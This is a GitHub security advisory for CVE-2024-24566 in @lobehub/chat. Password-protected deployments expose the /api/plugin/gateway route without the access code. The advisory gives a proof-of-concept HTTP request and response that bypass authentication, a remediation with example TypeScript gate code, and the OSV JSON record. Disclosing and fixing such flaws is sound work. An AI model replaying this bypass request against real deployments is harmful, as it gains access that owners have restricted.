ghsa-pf55-fj96-xf37
Vulnerability from github
Published
2024-01-31 18:04
Modified
2024-01-31 20:25
Summary
@lobehub/chat vulnerable to unauthorized access to plugins
Details

Description:

When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without password).

Proof-of-Concept:

Let's suppose that the application has been deployed with the following command:

```
sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat
```

Due to the utilization of the ACCESS_CODE, access to the chat is possible only after entering the password:

(screenshot: the password prompt shown before the chat can be used; image at https://raw.githubusercontent.com/dastaj/assets/main/others/image.png)

However, it is possible to interact with chat plugins without entering the ACCESS_CODE. Example HTTP request:

```
POST /api/plugin/gateway HTTP/1.1
Host: localhost:3210
Content-Length: 1276

{"apiName":"checkWeatherUsingGET","arguments":"{\n  \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}
```

HTTP response:

```
HTTP/1.1 200 OK
[...]

{"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}
```

Remediation:

Verify the ACCESS_CODE for HTTP requests to the /api/plugin/: route.
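One way to implement this remediation, as an added example that is not lobe-chat's own code: a gate that verifies the deployment's ACCESS_CODE before any request under /api/plugin/ is handed to the plugin gateway. The route prefix and the TEST123 code come from the advisory; the header name x-lobe-chat-access-code, the request-target normalisation and the function names are assumptions made for the example.

```typescript
// Added example (not lobe-chat's own code): an ACCESS_CODE gate for /api/plugin/ routes.
import { timingSafeEqual } from "node:crypto";
import { posix } from "node:path";

// Header in which the client is assumed to send the deployment's ACCESS_CODE (assumption).
export const ACCESS_CODE_HEADER = "x-lobe-chat-access-code";

// Route prefix that the advisory says must be protected.
export const PROTECTED_PREFIX = "/api/plugin/";

export interface Decision {
  status: 200 | 401;
  reason: string;
}

// Constant-time comparison so a wrong code does not leak how many leading characters matched.
export function safeEqual(a: string, b: string): boolean {
  const ab = Buffer.from(a, "utf8");
  const bb = Buffer.from(b, "utf8");
  if (ab.length !== bb.length) return false;
  return timingSafeEqual(ab, bb);
}

// Reduce a request target ("/api/plugin/gateway?x=1") to a normalised path so that
// query strings and dot segments cannot be used to slip past the prefix check.
export function normalizePath(target: string): string {
  const pathOnly = target.split(/[?#]/, 1)[0];
  return posix.normalize(pathOnly || "/");
}

export function isProtectedPath(target: string): boolean {
  return normalizePath(target).startsWith(PROTECTED_PREFIX);
}

// Decide whether a request may reach the plugin gateway. accessCode is the server's
// ACCESS_CODE value; when it is undefined the deployment is not password-protected
// and the route stays open, exactly as the chat itself does.
export function authorizePluginRequest(
  target: string,
  headers: Record<string, string | undefined>,
  accessCode: string | undefined,
): Decision {
  if (!isProtectedPath(target)) {
    return { status: 200, reason: "route is not covered by this check" };
  }
  if (!accessCode) {
    return { status: 200, reason: "deployment has no ACCESS_CODE configured" };
  }
  // HTTP header names are case-insensitive; look the header up accordingly.
  const entry = Object.entries(headers).find(
    ([name]) => name.toLowerCase() === ACCESS_CODE_HEADER,
  );
  const presented = entry ? entry[1] : undefined;
  if (presented === undefined) {
    return { status: 401, reason: "missing access code" };
  }
  if (!safeEqual(presented, accessCode)) {
    return { status: 401, reason: "invalid access code" };
  }
  return { status: 200, reason: "access code verified" };
}

// Replay of the advisory's proof-of-concept request (no access-code header) against a
// deployment configured with ACCESS_CODE=TEST123: the gate answers 401 instead of 200.
const pocHeaders = { Host: "localhost:3210", "Content-Length": "1276" };
console.log(authorizePluginRequest("/api/plugin/gateway", pocHeaders, "TEST123"));
// A client that sends the correct code is let through.
console.log(
  authorizePluginRequest("/api/plugin/gateway", { [ACCESS_CODE_HEADER]: "TEST123" }, "TEST123"),
);
```

The check has to run before the gateway handler reads the submitted manifest, since in the proof-of-concept the manifest itself is attacker-supplied; it is also applied to the normalised path rather than the raw request target, so `/api/plugin/../plugin/gateway` or a query string does not change the outcome.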

Impact:

Unauthorized access to plugins.



{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.122.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@lobehub/chat"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.122.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24566"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-31T18:04:55Z",
    "nvd_published_at": "2024-01-31T17:15:39Z",
    "severity": "MODERATE"
  },
  "details": "###\tDescription:\nWhen the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).\n###\tProof-of-Concept:\nLet\u2019s suppose that application has been deployed with following command:\n```sudo docker run -d -p 3210:3210   -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123   --name lobe-chat   lobehub/lobe-chat```\nDue to the utilization of the `ACCESS_CODE`,  access to the chat is possible only after entering the password:\n \n![image](https://raw.githubusercontent.com/dastaj/assets/main/others/image.png)\n\n\nHowever, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. \nExample HTTP request:\n```\nPOST /api/plugin/gateway HTTP/1.1\nHost: localhost:3210\nContent-Length: 1276\n\n{\"apiName\":\"checkWeatherUsingGET\",\"arguments\":\"{\\n  \\\"location\\\": \\\"London\\\"\\n}\",\"identifier\":\"WeatherGPT\",\"type\":\"default\",\"manifest\":{\"api\":[{\"description\":\"Get current weather information\",\"name\":\"checkWeatherUsingGET\",\"parameters\":{\"properties\":{\"location\":{\"type\":\"string\"}},\"required\":[\"location\"],\"type\":\"object\"}}],\"homepage\":\"https://weathergpt.vercel.app/legal\",\"identifier\":\"WeatherGPT\",\"meta\":{\"avatar\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp\",\"description\":\"Get current weather information for a specific location.\",\"title\":\"WeatherGPT\"},\"openapi\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json\",\"systemRole\":\"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it\u0027s being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.\",\"type\":\"default\",\"version\":\"1\",\"settings\":{\"properties\":{},\"type\":\"object\"}}}\n```\nHTTP response:\n```\nHTTP/1.1 200 OK\n[...]\n{\"location\":{\"name\":\"London\",\"region\":\"City of London, Greater London\",\"country\":\"United Kingdom\",\"lat\":51.52,\"lon\":-0.11,\"tz_id\":\"Europe/London\",\"localtime_epoch\":1706379026,\"localtime\":\"2024-01-27 18:10\"},\"current\":{\"last_updated_epoch\":1706378400,\"last_updated\":\"2024-01-27 18:00\",\"temp_c\":6,\"temp_f\":42.8,\"is_day\":0,\"condition\":{\"text\":\"Clear\",\"icon\":\"//cdn.weatherapi.com/weather/64x64/night/113.png\",\"code\":1000},\"wind_mph\":4.3,\"wind_kph\":6.8,\"wind_degree\":170,\"wind_dir\":\"S\",\"pressure_mb\":1031,\"pressure_in\":30.45,\"precip_mm\":0,\"precip_in\":0,\"humidity\":81,\"cloud\":0,\"feelslike_c\":3.8,\"feelslike_f\":38.9,\"vis_km\":10,\"vis_miles\":6,\"uv\":1,\"gust_mph\":9.5,\"gust_kph\":15.3},\"infoLink\":\"https://weathergpt.vercel.app/London\"}\n```\n###\tRemediation:\nVerify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.\n\n###\tImpact:\nUnauthorized access to plugins.",
  "id": "GHSA-pf55-fj96-xf37",
  "modified": "2024-01-31T20:25:37Z",
  "published": "2024-01-31T18:04:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24566"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lobehub/lobe-chat"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@lobehub/chat vulnerable to unauthorized access to plugins"
}

